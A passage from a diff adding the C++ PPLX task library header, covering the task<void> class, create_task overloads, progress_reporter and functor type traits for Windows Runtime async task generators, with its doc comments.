should throw if any wait(), get() or then() APIs are used. + } + + /// + /// Constructs a task object. + /// + /// + /// The type of the parameter from which the task is to be constructed. + /// + /// + /// The parameter from which the task is to be constructed. This could be a lambda, a function object, a + /// task_completion_event<result_type> object, or a Windows::Foundation::IAsyncInfo if you are + /// using tasks in your Windows Store app. The lambda or function object should be a type equivalent to + /// std::function<X(void)>, where X can be a variable of type result_type, + /// task<result_type>, or a Windows::Foundation::IAsyncInfo in Windows Store apps. + /// + /// + /// The default constructor for a task is only present in order to allow tasks to be used within + /// containers. A default constructed task cannot be used until you assign a valid task to it. Methods such as + /// get, wait or then will throw an invalid_argument exception when called on a default constructed task. A task that is + /// created from a task_completion_event will complete (and have its continuations scheduled) when the + /// task completion event is set. The version of the constructor that takes a cancellation token + /// creates a task that can be canceled using the cancellation_token_source the token was obtained from. + /// Tasks created without a cancellation token are not cancelable. Tasks created from a + /// Windows::Foundation::IAsyncInfo interface or a lambda that returns an IAsyncInfo interface + /// reach their terminal state when the enclosed Windows Runtime asynchronous operation or action completes. + /// Similarly, tasks created from a lambda that returns a task<result_type> reach their terminal + /// state when the inner task reaches its terminal state, and not when the lambda returns. + /// task behaves like a smart pointer and is safe to pass around by value. It can be accessed by + /// multiple threads without the need for locks. The constructor overloads that take a + /// Windows::Foundation::IAsyncInfo interface or a lambda returning such an interface, are only available to + /// Windows Store apps. For more information, see . + /// + /**/ + template + __declspec(noinline) // Ask for no inlining so that the PPLX_CAPTURE_CALLSTACK gives us the expected result + explicit task(_Ty _Param, const task_options& _TaskOptions = task_options()) + { + details::_ValidateTaskConstructorArgs(_Param); + + _M_unitTask._CreateImpl(_TaskOptions.get_cancellation_token()._GetImplValue(), _TaskOptions.get_scheduler()); + // Do not move the next line out of this function. It is important that PPLX_CAPTURE_CALLSTACK() evaluate to the + // the call site of the task constructor. + _M_unitTask._SetTaskCreationCallstack( + details::_get_internal_task_options(_TaskOptions)._M_hasPresetCreationCallstack + ? details::_get_internal_task_options(_TaskOptions)._M_presetCreationCallstack + : PPLX_CAPTURE_CALLSTACK()); + + _TaskInitMaybeFunctor(_Param, details::_IsCallable(_Param, 0)); + } + + /// + /// Constructs a task object. + /// + /// + /// The source task object. + /// + /// + /// The default constructor for a task is only present in order to allow tasks to be used within + /// containers. A default constructed task cannot be used until you assign a valid task to it. Methods such as + /// get, wait or then will throw an invalid_argument exception when called on a default constructed task. A task that is + /// created from a task_completion_event will complete (and have its continuations scheduled) when the + /// task completion event is set. The version of the constructor that takes a cancellation token + /// creates a task that can be canceled using the cancellation_token_source the token was obtained from. + /// Tasks created without a cancellation token are not cancelable. Tasks created from a + /// Windows::Foundation::IAsyncInfo interface or a lambda that returns an IAsyncInfo interface + /// reach their terminal state when the enclosed Windows Runtime asynchronous operation or action completes. + /// Similarly, tasks created from a lambda that returns a task<result_type> reach their terminal + /// state when the inner task reaches its terminal state, and not when the lambda returns. + /// task behaves like a smart pointer and is safe to pass around by value. It can be accessed by + /// multiple threads without the need for locks. The constructor overloads that take a + /// Windows::Foundation::IAsyncInfo interface or a lambda returning such an interface, are only available to + /// Windows Store apps. For more information, see . + /// + /**/ + task(const task& _Other) : _M_unitTask(_Other._M_unitTask) {} + + /// + /// Constructs a task object. + /// + /// + /// The source task object. + /// + /// + /// The default constructor for a task is only present in order to allow tasks to be used within + /// containers. A default constructed task cannot be used until you assign a valid task to it. Methods such as + /// get, wait or then will throw an invalid_argument exception when called on a default constructed task. A task that is + /// created from a task_completion_event will complete (and have its continuations scheduled) when the + /// task completion event is set. The version of the constructor that takes a cancellation token + /// creates a task that can be canceled using the cancellation_token_source the token was obtained from. + /// Tasks created without a cancellation token are not cancelable. Tasks created from a + /// Windows::Foundation::IAsyncInfo interface or a lambda that returns an IAsyncInfo interface + /// reach their terminal state when the enclosed Windows Runtime asynchronous operation or action completes. + /// Similarly, tasks created from a lambda that returns a task<result_type> reach their terminal + /// state when the inner task reaches its terminal state, and not when the lambda returns. + /// task behaves like a smart pointer and is safe to pass around by value. It can be accessed by + /// multiple threads without the need for locks. The constructor overloads that take a + /// Windows::Foundation::IAsyncInfo interface or a lambda returning such an interface, are only available to + /// Windows Store apps. For more information, see . + /// + /**/ + task(task&& _Other) : _M_unitTask(std::move(_Other._M_unitTask)) {} + + /// + /// Replaces the contents of one task object with another. + /// + /// + /// The source task object. + /// + /// + /// As task behaves like a smart pointer, after a copy assignment, this task objects represents + /// the same actual task as does. + /// + /**/ + task& operator=(const task& _Other) + { + if (this != &_Other) + { + _M_unitTask = _Other._M_unitTask; + } + return *this; + } + + /// + /// Replaces the contents of one task object with another. + /// + /// + /// The source task object. + /// + /// + /// As task behaves like a smart pointer, after a copy assignment, this task objects represents + /// the same actual task as does. + /// + /**/ + task& operator=(task&& _Other) + { + if (this != &_Other) + { + _M_unitTask = std::move(_Other._M_unitTask); + } + return *this; + } + + /// + /// Adds a continuation task to this task. + /// + /// + /// The type of the function object that will be invoked by this task. + /// + /// + /// The continuation function to execute when this task completes. This continuation function must take as input + /// a variable of either result_type or task<result_type>, where result_type is the + /// type of the result this task produces. + /// + /// + /// The cancellation token to associate with the continuation task. A continuation task that is created without + /// a cancellation token will inherit the token of its antecedent task. + /// + /// + /// The newly created continuation task. The result type of the returned task is determined by what returns. + /// + /// + /// The overloads of then that take a lambda or functor that returns a Windows::Foundation::IAsyncInfo + /// interface, are only available to Windows Store apps. For more information on how to use task + /// continuations to compose asynchronous work, see . + /// + /**/ + template + __declspec(noinline) // Ask for no inlining so that the PPLX_CAPTURE_CALLSTACK gives us the expected result + auto then(_Function&& _Func, task_options _TaskOptions = task_options()) const -> + typename details::_ContinuationTypeTraits<_Function, void>::_TaskOfType + { + details::_get_internal_task_options(_TaskOptions)._set_creation_callstack(PPLX_CAPTURE_CALLSTACK()); + return _M_unitTask._ThenImpl(std::forward<_Function>(_Func), _TaskOptions); + } + + /// + /// Adds a continuation task to this task. + /// + /// + /// The type of the function object that will be invoked by this task. + /// + /// + /// The continuation function to execute when this task completes. This continuation function must take as input + /// a variable of either result_type or task<result_type>, where result_type is the + /// type of the result this task produces. + /// + /// + /// The cancellation token to associate with the continuation task. A continuation task that is created without + /// a cancellation token will inherit the token of its antecedent task. + /// + /// + /// A variable that specifies where the continuation should execute. This variable is only useful when used in a + /// Windows Store style app. For more information, see task_continuation_context + /// + /// + /// The newly created continuation task. The result type of the returned task is determined by what returns. + /// + /// + /// The overloads of then that take a lambda or functor that returns a Windows::Foundation::IAsyncInfo + /// interface, are only available to Windows Store apps. For more information on how to use task + /// continuations to compose asynchronous work, see . + /// + /**/ + template + __declspec(noinline) // Ask for no inlining so that the PPLX_CAPTURE_CALLSTACK gives us the expected result + auto then(_Function&& _Func, + cancellation_token _CancellationToken, + task_continuation_context _ContinuationContext) const -> + typename details::_ContinuationTypeTraits<_Function, void>::_TaskOfType + { + task_options _TaskOptions(_CancellationToken, _ContinuationContext); + details::_get_internal_task_options(_TaskOptions)._set_creation_callstack(PPLX_CAPTURE_CALLSTACK()); + return _M_unitTask._ThenImpl(std::forward<_Function>(_Func), _TaskOptions); + } + + /// + /// Waits for this task to reach a terminal state. It is possible for wait to execute the task inline, if + /// all of the tasks dependencies are satisfied, and it has not already been picked up for execution by a + /// background worker. + /// + /// + /// A task_status value which could be either completed or canceled. If the task + /// encountered an exception during execution, or an exception was propagated to it from an antecedent task, + /// wait will throw that exception. + /// + /**/ + task_status wait() const { return _M_unitTask.wait(); } + + /// + /// Returns the result this task produced. If the task is not in a terminal state, a call to get will + /// wait for the task to finish. This method does not return a value when called on a task with a + /// result_type of void. + /// + /// + /// If the task is canceled, a call to get will throw a task_canceled exception. If the task encountered an different exception or an exception was + /// propagated to it from an antecedent task, a call to get will throw that exception. + /// + /**/ + void get() const { _M_unitTask.get(); } + + /// + /// Determines if the task is completed. + /// + /// + /// True if the task has completed, false otherwise. + /// + /// + /// The function returns true if the task is completed or canceled (with or without user exception). + /// + bool is_done() const { return _M_unitTask.is_done(); } + + /// + /// Returns the scheduler for this task + /// + /// + /// A pointer to the scheduler + /// + scheduler_ptr scheduler() const { return _M_unitTask.scheduler(); } + + /// + /// Determines whether the task unwraps a Windows Runtime IAsyncInfo interface or is descended from such + /// a task. + /// + /// + /// true if the task unwraps an IAsyncInfo interface or is descended from such a task, + /// false otherwise. + /// + /**/ + bool is_apartment_aware() const { return _M_unitTask.is_apartment_aware(); } + + /// + /// Determines whether two task objects represent the same internal task. + /// + /// + /// true if the objects refer to the same underlying task, and false otherwise. + /// + /**/ + bool operator==(const task& _Rhs) const { return (_M_unitTask == _Rhs._M_unitTask); } + + /// + /// Determines whether two task objects represent different internal tasks. + /// + /// + /// true if the objects refer to different underlying tasks, and false otherwise. + /// + /**/ + bool operator!=(const task& _Rhs) const { return !operator==(_Rhs); } + + /// + /// Create an underlying task implementation. + /// + void _CreateImpl(details::_CancellationTokenState* _Ct, scheduler_ptr _Scheduler) + { + _M_unitTask._CreateImpl(_Ct, _Scheduler); + } + + /// + /// Return the underlying implementation for this task. + /// + const details::_Task_ptr::_Type& _GetImpl() const { return _M_unitTask._M_Impl; } + + /// + /// Set the implementation of the task to be the supplied implementation. + /// + void _SetImpl(const details::_Task_ptr::_Type& _Impl) { _M_unitTask._SetImpl(_Impl); } + + /// + /// Set the implementation of the task to be the supplied implementation using a move instead of a copy. + /// + void _SetImpl(details::_Task_ptr::_Type&& _Impl) { _M_unitTask._SetImpl(std::move(_Impl)); } + + /// + /// Sets a property determining whether the task is apartment aware. + /// + void _SetAsync(bool _Async = true) { _M_unitTask._SetAsync(_Async); } + + /// + /// Sets a field in the task impl to the return callstack for calls to the task constructors and the then + /// method. + /// + void _SetTaskCreationCallstack(const details::_TaskCreationCallstack& _callstack) + { + _M_unitTask._SetTaskCreationCallstack(_callstack); + } + + /// + /// An internal version of then that takes additional flags and executes the continuation inline. Used for + /// runtime internal continuations only. + /// + template + auto _Then(_Function&& _Func, + details::_CancellationTokenState* _PTokenState, + details::_TaskInliningMode_t _InliningMode = details::_ForceInline) const -> + typename details::_ContinuationTypeTraits<_Function, void>::_TaskOfType + { + // inherit from antecedent + auto _Scheduler = _GetImpl()->_GetScheduler(); + + return _M_unitTask._ThenImpl(std::forward<_Function>(_Func), + _PTokenState, + task_continuation_context::use_default(), + _Scheduler, + PPLX_CAPTURE_CALLSTACK(), + _InliningMode); + } + +private: + template + friend class task; + template + friend class task_completion_event; + + /// + /// Initializes a task using a task completion event. + /// + void _TaskInitNoFunctor(task_completion_event& _Event) + { + _M_unitTask._TaskInitNoFunctor(_Event._M_unitEvent); + } + +#if defined(__cplusplus_winrt) + /// + /// Initializes a task using an asynchronous action IAsyncAction^ + /// + void _TaskInitNoFunctor(Windows::Foundation::IAsyncAction ^ _AsyncAction) + { + _M_unitTask._TaskInitAsyncOp(ref new details::_IAsyncActionToAsyncOperationConverter(_AsyncAction)); + } + + /// + /// Initializes a task using an asynchronous action with progress IAsyncActionWithProgress<_P>^ + /// + template + void _TaskInitNoFunctor(Windows::Foundation::IAsyncActionWithProgress<_P> ^ _AsyncActionWithProgress) + { + _M_unitTask._TaskInitAsyncOp( + ref new details::_IAsyncActionWithProgressToAsyncOperationConverter<_P>(_AsyncActionWithProgress)); + } +#endif /* defined (__cplusplus_winrt) */ + + /// + /// Initializes a task using a callable object. + /// + template + void _TaskInitMaybeFunctor(_Function& _Func, std::true_type) + { + _M_unitTask._TaskInitWithFunctor(_Func); + } + + /// + /// Initializes a task using a non-callable object. + /// + template + void _TaskInitMaybeFunctor(_T& _Param, std::false_type) + { + _TaskInitNoFunctor(_Param); + } + + // The void task contains a task of a dummy type so common code can be used for tasks with void and non-void + // results. + task _M_unitTask; +}; + +namespace details +{ +/// +/// The following type traits are used for the create_task function. +/// + +#if defined(__cplusplus_winrt) +// Unwrap functions for asyncOperations +template +_Ty _GetUnwrappedType(Windows::Foundation::IAsyncOperation<_Ty> ^); + +void _GetUnwrappedType(Windows::Foundation::IAsyncAction ^); + +template +_Ty _GetUnwrappedType(Windows::Foundation::IAsyncOperationWithProgress<_Ty, _Progress> ^); + +template +void _GetUnwrappedType(Windows::Foundation::IAsyncActionWithProgress<_Progress> ^); +#endif /* defined (__cplusplus_winrt) */ + +// Unwrap task +template +_Ty _GetUnwrappedType(task<_Ty>); + +// Unwrap all supported types +template +auto _GetUnwrappedReturnType(_Ty _Arg, int) -> decltype(_GetUnwrappedType(_Arg)); +// fallback +template +_Ty _GetUnwrappedReturnType(_Ty, ...); + +/// +/// _GetTaskType functions will retrieve task type T in task[T](Arg), +/// for given constructor argument Arg and its property "callable". +/// It will automatically unwrap argument to get the final return type if necessary. +/// + +// Non-Callable +template +_Ty _GetTaskType(task_completion_event<_Ty>, std::false_type); + +// Non-Callable +template +auto _GetTaskType(_Ty _NonFunc, std::false_type) -> decltype(_GetUnwrappedType(_NonFunc)); + +// Callable +template +auto _GetTaskType(_Ty _Func, std::true_type) -> decltype(_GetUnwrappedReturnType(_Func(), 0)); + +// Special callable returns void +void _GetTaskType(std::function, std::true_type); +struct _BadArgType +{ +}; + +template +auto _FilterValidTaskType(_Ty _Param, int) -> decltype(_GetTaskType(_Param, _IsCallable(_Param, 0))); + +template +_BadArgType _FilterValidTaskType(_Ty _Param, ...); + +template +struct _TaskTypeFromParam +{ + typedef decltype(_FilterValidTaskType(stdx::declval<_Ty>(), 0)) _Type; +}; +} // namespace details + +/// +/// Creates a PPL task object. create_task can be used anywhere you would have +/// used a task constructor. It is provided mainly for convenience, because it allows use of the auto keyword +/// while creating tasks. +/// +/// +/// The type of the parameter from which the task is to be constructed. +/// +/// +/// The parameter from which the task is to be constructed. This could be a lambda or function object, a +/// task_completion_event object, a different task object, or a Windows::Foundation::IAsyncInfo +/// interface if you are using tasks in your Windows Store app. +/// +/// +/// A new task of type T, that is inferred from . +/// +/// +/// The first overload behaves like a task constructor that takes a single parameter. +/// The second overload associates the cancellation token provided with the newly created task. If you use +/// this overload you are not allowed to pass in a different task object as the first parameter. +/// The type of the returned task is inferred from the first parameter to the function. If is a task_completion_event<T>, a task<T>, or a functor that returns +/// either type T or task<T>, the type of the created task is task<T>. +/// In a Windows Store app, if is of type +/// Windows::Foundation::IAsyncOperation<T>^ or Windows::Foundation::IAsyncOperationWithProgress<T,P>^, +/// or a functor that returns either of those types, the created task will be of type task<T>. If +/// is of type Windows::Foundation::IAsyncAction^ or +/// Windows::Foundation::IAsyncActionWithProgress<P>^, or a functor that returns either of those types, the +/// created task will have type task<void>. +/// +/// +/// +/**/ +template +__declspec(noinline) auto create_task(_Ty _Param, task_options _TaskOptions = task_options()) + -> task::_Type> +{ + static_assert(!std::is_same::_Type, details::_BadArgType>::value, +#if defined(__cplusplus_winrt) + "incorrect argument for create_task; can be a callable object, an asynchronous operation, or a " + "task_completion_event" +#else /* defined (__cplusplus_winrt) */ + "incorrect argument for create_task; can be a callable object or a task_completion_event" +#endif /* defined (__cplusplus_winrt) */ + ); + details::_get_internal_task_options(_TaskOptions)._set_creation_callstack(PPLX_CAPTURE_CALLSTACK()); + task::_Type> _CreatedTask(_Param, _TaskOptions); + return _CreatedTask; +} + +/// +/// Creates a PPL task object. create_task can be used anywhere you would have +/// used a task constructor. It is provided mainly for convenience, because it allows use of the auto keyword +/// while creating tasks. +/// +/// +/// The type of the parameter from which the task is to be constructed. +/// +/// +/// The parameter from which the task is to be constructed. This could be a lambda or function object, a +/// task_completion_event object, a different task object, or a Windows::Foundation::IAsyncInfo +/// interface if you are using tasks in your Windows Store app. +/// +/// +/// The cancellation token to associate with the task. When the source for this token is canceled, cancellation will +/// be requested on the task. +/// +/// +/// A new task of type T, that is inferred from . +/// +/// +/// The first overload behaves like a task constructor that takes a single parameter. +/// The second overload associates the cancellation token provided with the newly created task. If you use +/// this overload you are not allowed to pass in a different task object as the first parameter. +/// The type of the returned task is inferred from the first parameter to the function. If is a task_completion_event<T>, a task<T>, or a functor that returns +/// either type T or task<T>, the type of the created task is task<T>. +/// In a Windows Store app, if is of type +/// Windows::Foundation::IAsyncOperation<T>^ or Windows::Foundation::IAsyncOperationWithProgress<T,P>^, +/// or a functor that returns either of those types, the created task will be of type task<T>. If +/// is of type Windows::Foundation::IAsyncAction^ or +/// Windows::Foundation::IAsyncActionWithProgress<P>^, or a functor that returns either of those types, the +/// created task will have type task<void>. +/// +/// +/// +/**/ +template +__declspec(noinline) task<_ReturnType> create_task(const task<_ReturnType>& _Task) +{ + task<_ReturnType> _CreatedTask(_Task); + return _CreatedTask; +} + +#if defined(__cplusplus_winrt) +namespace details +{ +template +task<_T> _To_task_helper(Windows::Foundation::IAsyncOperation<_T> ^ op) +{ + return task<_T>(op); +} + +template +task<_T> _To_task_helper(Windows::Foundation::IAsyncOperationWithProgress<_T, _Progress> ^ op) +{ + return task<_T>(op); +} + +inline task _To_task_helper(Windows::Foundation::IAsyncAction ^ op) { return task(op); } + +template +task _To_task_helper(Windows::Foundation::IAsyncActionWithProgress<_Progress> ^ op) +{ + return task(op); +} + +template +class _ProgressDispatcherBase +{ +public: + virtual ~_ProgressDispatcherBase() {} + + virtual void _Report(const _ProgressType& _Val) = 0; +}; + +template +class _ProgressDispatcher : public _ProgressDispatcherBase<_ProgressType> +{ +public: + virtual ~_ProgressDispatcher() {} + + _ProgressDispatcher(_ClassPtrType _Ptr) : _M_ptr(_Ptr) {} + + virtual void _Report(const _ProgressType& _Val) { _M_ptr->_FireProgress(_Val); } + +private: + _ClassPtrType _M_ptr; +}; +class _ProgressReporterCtorArgType +{ +}; +} // namespace details + +/// +/// The progress reporter class allows reporting progress notifications of a specific type. Each progress_reporter +/// object is bound to a particular asynchronous action or operation. +/// +/// +/// The payload type of each progress notification reported through the progress reporter. +/// +/// +/// This type is only available to Windows Store apps. +/// +/// +/**/ +template +class progress_reporter +{ + typedef std::shared_ptr> _PtrType; + +public: + /// + /// Sends a progress report to the asynchronous action or operation to which this progress reporter is bound. + /// + /// + /// The payload to report through a progress notification. + /// + /**/ + void report(const _ProgressType& _Val) const { _M_dispatcher->_Report(_Val); } + + template + static progress_reporter _CreateReporter(_ClassPtrType _Ptr) + { + progress_reporter _Reporter; + details::_ProgressDispatcherBase<_ProgressType>* _PDispatcher = + new details::_ProgressDispatcher<_ProgressType, _ClassPtrType>(_Ptr); + _Reporter._M_dispatcher = _PtrType(_PDispatcher); + return _Reporter; + } + progress_reporter() {} + +private: + progress_reporter(details::_ProgressReporterCtorArgType); + + _PtrType _M_dispatcher; +}; + +namespace details +{ +// +// maps internal definitions for AsyncStatus and defines states that are not client visible +// +enum _AsyncStatusInternal +{ + _AsyncCreated = -1, // externally invisible + // client visible states (must match AsyncStatus exactly) + _AsyncStarted = 0, // Windows::Foundation::AsyncStatus::Started, + _AsyncCompleted = 1, // Windows::Foundation::AsyncStatus::Completed, + _AsyncCanceled = 2, // Windows::Foundation::AsyncStatus::Canceled, + _AsyncError = 3, // Windows::Foundation::AsyncStatus::Error, + // non-client visible internal states + _AsyncCancelPending, + _AsyncClosed, + _AsyncUndefined +}; + +// +// designates whether the "GetResults" method returns a single result (after complete fires) or multiple results +// (which are progressively consumable between Start state and before Close is called) +// +enum _AsyncResultType +{ + SingleResult = 0x0001, + MultipleResults = 0x0002 +}; + +// *************************************************************************** +// Template type traits and helpers for async production APIs: +// + +struct _ZeroArgumentFunctor +{ +}; +struct _OneArgumentFunctor +{ +}; +struct _TwoArgumentFunctor +{ +}; + +// **************************************** +// CLASS TYPES: + +// ******************** +// TWO ARGUMENTS: + +// non-void arg: +template +_Arg1 _Arg1ClassHelperThunk(_ReturnType (_Class::*)(_Arg1, _Arg2) const); + +// non-void arg: +template +_Arg2 _Arg2ClassHelperThunk(_ReturnType (_Class::*)(_Arg1, _Arg2) const); + +template +_ReturnType _ReturnTypeClassHelperThunk(_ReturnType (_Class::*)(_Arg1, _Arg2) const); + +template +_TwoArgumentFunctor _ArgumentCountHelper(_ReturnType (_Class::*)(_Arg1, _Arg2) const); + +// ******************** +// ONE ARGUMENT: + +// non-void arg: +template +_Arg1 _Arg1ClassHelperThunk(_ReturnType (_Class::*)(_Arg1) const); + +// non-void arg: +template +void _Arg2ClassHelperThunk(_ReturnType (_Class::*)(_Arg1) const); + +template +_ReturnType _ReturnTypeClassHelperThunk(_ReturnType (_Class::*)(_Arg1) const); + +template +_OneArgumentFunctor _ArgumentCountHelper(_ReturnType (_Class::*)(_Arg1) const); + +// ******************** +// ZERO ARGUMENT: + +// void arg: +template +void _Arg1ClassHelperThunk(_ReturnType (_Class::*)() const); + +// void arg: +template +void _Arg2ClassHelperThunk(_ReturnType (_Class::*)() const); + +// void arg: +template +_ReturnType _ReturnTypeClassHelperThunk(_ReturnType (_Class::*)() const); + +template +_ZeroArgumentFunctor _ArgumentCountHelper(_ReturnType (_Class::*)() const); + +// **************************************** +// POINTER TYPES: + +// ******************** +// TWO ARGUMENTS: + +template +_Arg1 _Arg1PFNHelperThunk(_ReturnType(__cdecl*)(_Arg1, _Arg2)); + +template +_Arg2 _Arg2PFNHelperThunk(_ReturnType(__cdecl*)(_Arg1, _Arg2)); + +template +_ReturnType _ReturnTypePFNHelperThunk(_ReturnType(__cdecl*)(_Arg1, _Arg2)); + +template +_TwoArgumentFunctor _ArgumentCountHelper(_ReturnType(__cdecl*)(_Arg1, _Arg2)); + +template +_Arg1 _Arg1PFNHelperThunk(_ReturnType(__stdcall*)(_Arg1, _Arg2)); + +template +_Arg2 _Arg2PFNHelperThunk(_ReturnType(__stdcall*)(_Arg1, _Arg2)); + +template +_ReturnType _ReturnTypePFNHelperThunk(_ReturnType(__stdcall*)(_Arg1, _Arg2)); + +template +_TwoArgumentFunctor _ArgumentCountHelper(_ReturnType(__stdcall*)(_Arg1, _Arg2)); + +template +_Arg1 _Arg1PFNHelperThunk(_ReturnType(__fastcall*)(_Arg1, _Arg2)); + +template +_Arg2 _Arg2PFNHelperThunk(_ReturnType(__fastcall*)(_Arg1, _Arg2)); + +template +_ReturnType _ReturnTypePFNHelperThunk(_ReturnType(__fastcall*)(_Arg1, _Arg2)); + +template +_TwoArgumentFunctor _ArgumentCountHelper(_ReturnType(__fastcall*)(_Arg1, _Arg2)); + +// ******************** +// ONE ARGUMENT: + +template +_Arg1 _Arg1PFNHelperThunk(_ReturnType(__cdecl*)(_Arg1)); + +template +void _Arg2PFNHelperThunk(_ReturnType(__cdecl*)(_Arg1)); + +template +_ReturnType _ReturnTypePFNHelperThunk(_ReturnType(__cdecl*)(_Arg1)); + +template +_OneArgumentFunctor _ArgumentCountHelper(_ReturnType(__cdecl*)(_Arg1)); + +template +_Arg1 _Arg1PFNHelperThunk(_ReturnType(__stdcall*)(_Arg1)); + +template +void _Arg2PFNHelperThunk(_ReturnType(__stdcall*)(_Arg1)); + +template +_ReturnType _ReturnTypePFNHelperThunk(_ReturnType(__stdcall*)(_Arg1)); + +template +_OneArgumentFunctor _ArgumentCountHelper(_ReturnType(__stdcall*)(_Arg1)); + +template +_Arg1 _Arg1PFNHelperThunk(_ReturnType(__fastcall*)(_Arg1)); + +template +void _Arg2PFNHelperThunk(_ReturnType(__fastcall*)(_Arg1)); + +template +_ReturnType _ReturnTypePFNHelperThunk(_ReturnType(__fastcall*)(_Arg1)); + +template +_OneArgumentFunctor _ArgumentCountHelper(_ReturnType(__fastcall*)(_Arg1)); + +// ******************** +// ZERO ARGUMENT: + +template +void _Arg1PFNHelperThunk(_ReturnType(__cdecl*)()); + +template +void _Arg2PFNHelperThunk(_ReturnType(__cdecl*)()); + +template +_ReturnType _ReturnTypePFNHelperThunk(_ReturnType(__cdecl*)()); + +template +_ZeroArgumentFunctor _ArgumentCountHelper(_ReturnType(__cdecl*)()); + +template +void _Arg1PFNHelperThunk(_ReturnType(__stdcall*)()); + +template +void _Arg2PFNHelperThunk(_ReturnType(__stdcall*)()); + +template +_ReturnType _ReturnTypePFNHelperThunk(_ReturnType(__stdcall*)()); + +template +_ZeroArgumentFunctor _ArgumentCountHelper(_ReturnType(__stdcall*)()); + +template +void _Arg1PFNHelperThunk(_ReturnType(__fastcall*)()); + +template +void _Arg2PFNHelperThunk(_ReturnType(__fastcall*)()); + +template +_ReturnType _ReturnTypePFNHelperThunk(_ReturnType(__fastcall*)()); + +template +_ZeroArgumentFunctor _ArgumentCountHelper(_ReturnType(__fastcall*)()); + +template +struct _FunctorArguments +{ + static const size_t _Count = 0; +}; + +template<> +struct _FunctorArguments<_OneArgumentFunctor> +{ + static const size_t _Count = 1; +}; + +template<> +struct _FunctorArguments<_TwoArgumentFunctor> +{ + static const size_t _Count = 2; +}; + +template +struct _FunctorTypeTraits +{ + typedef decltype(_ArgumentCountHelper(&(_T::operator()))) _ArgumentCountType; + static const size_t _ArgumentCount = _FunctorArguments<_ArgumentCountType>::_Count; + + typedef decltype(_ReturnTypeClassHelperThunk(&(_T::operator()))) _ReturnType; + typedef decltype(_Arg1ClassHelperThunk(&(_T::operator()))) _Argument1Type; + typedef decltype(_Arg2ClassHelperThunk(&(_T::operator()))) _Argument2Type; +}; + +template +struct _FunctorTypeTraits<_T*> +{ + typedef decltype(_ArgumentCountHelper(stdx::declval<_T*>())) _ArgumentCountType; + static const size_t _ArgumentCount = _FunctorArguments<_ArgumentCountType>::_Count; + + typedef decltype(_ReturnTypePFNHelperThunk(stdx::declval<_T*>())) _ReturnType; + typedef decltype(_Arg1PFNHelperThunk(stdx::declval<_T*>())) _Argument1Type; + typedef decltype(_Arg2PFNHelperThunk(stdx::declval<_T*>())) _Argument2Type; +}; + +template +struct _ProgressTypeTraits +{ + static const bool _TakesProgress = false; + typedef void _ProgressType; +}; + +template +struct _ProgressTypeTraits> +{ + static const bool _TakesProgress = true; + typedef typename _T _ProgressType; +}; + +template::_ArgumentCount> +struct _CAFunctorOptions +{ + static const bool _TakesProgress = false; + static const bool _TakesToken = false; + typedef void _ProgressType; +}; + +template +struct _CAFunctorOptions<_T, 1> +{ +private: + typedef typename _FunctorTypeTraits<_T>::_Argument1Type _Argument1Type; + +public: + static const bool _TakesProgress = _ProgressTypeTraits<_Argument1Type>::_TakesProgress; + static const bool _TakesToken = !_TakesProgress; + typedef typename _ProgressTypeTraits<_Argument1Type>::_ProgressType _ProgressType; +}; + +template +struct _CAFunctorOptions<_T, 2> +{ +private: + typedef typename _FunctorTypeTraits<_T>::_Argument1Type _Argument1Type; + +public: + static const bool _TakesProgress = true; + static const bool _TakesToken = true; + typedef typename _ProgressTypeTraits<_Argument1Type>::_ProgressType _ProgressType; +}; + +ref class _Zip +{ +}; + +// *************************************************************************** +// Async Operation Task Generators +// + +// +// Functor returns an IAsyncInfo - result needs to be wrapped in a task: +// +template +struct _SelectorTaskGenerator +{ + template + static task<_ReturnType> _GenerateTask_0(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task<_ReturnType>(_Func(), _taskOptinos); + } + + template + static task<_ReturnType> _GenerateTask_1C(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task<_ReturnType>(_Func(_Cts.get_token()), _taskOptinos); + } + + template + static task<_ReturnType> _GenerateTask_1P(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task<_ReturnType>(_Func(_Progress), _taskOptinos); + } + + template + static task<_ReturnType> _GenerateTask_2PC(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task<_ReturnType>(_Func(_Progress, _Cts.get_token()), _taskOptinos); + } +}; + +template +struct _SelectorTaskGenerator<_AsyncSelector, void> +{ + template + static task _GenerateTask_0(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task(_Func(), _taskOptinos); + } + + template + static task _GenerateTask_1C(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task(_Func(_Cts.get_token()), _taskOptinos); + } + + template + static task _GenerateTask_1P(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task(_Func(_Progress), _taskOptinos); + } + + template + static task _GenerateTask_2PC(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task(_Func(_Progress, _Cts.get_token()), _taskOptinos); + } +}; + +// +// Functor returns a result - it needs to be wrapped in a task: +// +template +struct _SelectorTaskGenerator<_TypeSelectorNoAsync, _ReturnType> +{ + +#pragma warning(push) +#pragma warning(disable : 4702) + template + static task<_ReturnType> _GenerateTask_0(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return 